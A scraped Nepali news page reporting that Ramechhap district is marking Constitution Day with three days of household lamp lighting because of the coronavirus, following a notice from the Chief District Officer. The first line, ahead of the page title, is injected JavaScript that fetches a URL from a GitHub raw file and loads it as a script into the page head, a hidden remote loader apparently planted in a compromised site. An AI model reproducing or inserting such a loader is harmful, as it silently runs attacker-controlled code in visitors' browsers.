;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); रामेछापमा तीनदिन दिप प्रज्वलन गरि संविधान दिवस मनाइदै – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • रामेछापमा तीनदिन दिप प्रज्वलन गरि संविधान दिवस मनाइदै
रामेछाप बिशेष

रामेछापमा तीनदिन दिप प्रज्वलन गरि संविधान दिवस मनाइदै

भदौ ३१,

रामेछाप । रामेछापमा तीनदिन घरघरमा दिप प्रज्वलन गरि संविधान दिवस मनाइने भएको छ । बुधबार जिल्ला प्रशासन कार्यालय रामेछापले सूचना जारी गरि दिवस मनाउन आग्रह गरेको छ ।

संघीय लोकतान्त्रिक गणतन्त्र नेपालको संविधान २०७२ जारी भएको दिन असोज ३ को उपलक्ष्यमा हरेक वर्ष विभिन्न कार्यक्रम गरि मनाइदै आएकोमा यसवर्ष विश्वव्यापी रुपमा फैलिएको कोरोना भाइरसका कारण विगतका वर्षहरुमा जस्तै भौतिक उपस्थितीमा दिवस मनाउन कठिनाई भएकाले असोज २ गतेदेखी तीनदिन घरघरमा दिप प्रज्वलन गरि दिवस मनाउन आह्वन गरेको हो ।

रामेछापकी प्रमुख जिल्ला अधिकारी रुद्रादेवी शर्माले जारी गरेको सूचनामा प्रदेश तथा स्थानीय तहका सम्पुर्ण सरकारी निकाय ,प्रतिष्ठान , संघसंस्था,कार्यालयहरुमा राष्ट्रिय झण्डा फहराउने तथा आम सर्वसाधारणहरुले असोज २,३ र ४ गते घरघरमा दिप प्रज्वलन गरि संविधान दिनवस मनाउने उल्लेख गरिएको छ ।

प्रमुख जिल्ला अधिकारी शर्माद्वरा जारी सूचनामा संविधान दिवसमा स्थानीय संचारमाध्यम तथा पत्रपत्रिकाबाट संविधानसंग सम्बन्धित विभिन्न सन्देश तथा कार्यक्रमहरु प्रसारण तथा प्रकाशन गर्ने, विभिन्न मन्दिर, बुद्ध विहार ,मस्जीद ,चर्च एवं गुरुद्धार लगायतका धार्मिक स्थालहरुमा नित्य पुजा गर्दा राष्ट्र राष्ट्रियता,स्वतन्त्रता र संविधानका लागि आफ्नो जीवन उत्सर्ग गर्ने ज्ञात अज्ञात शहीदहरुको आत्माको चिरशान्तिका लागि राष्ट्रका तर्फबाट उच्च सम्मान र श्रद्धाञ्जली प्रकट गर्दै पुजापाठ तथा प्रार्थना गर्ने उल्लेख गरिएको छ ।

फेसबुक प्रतिक्रियाहरु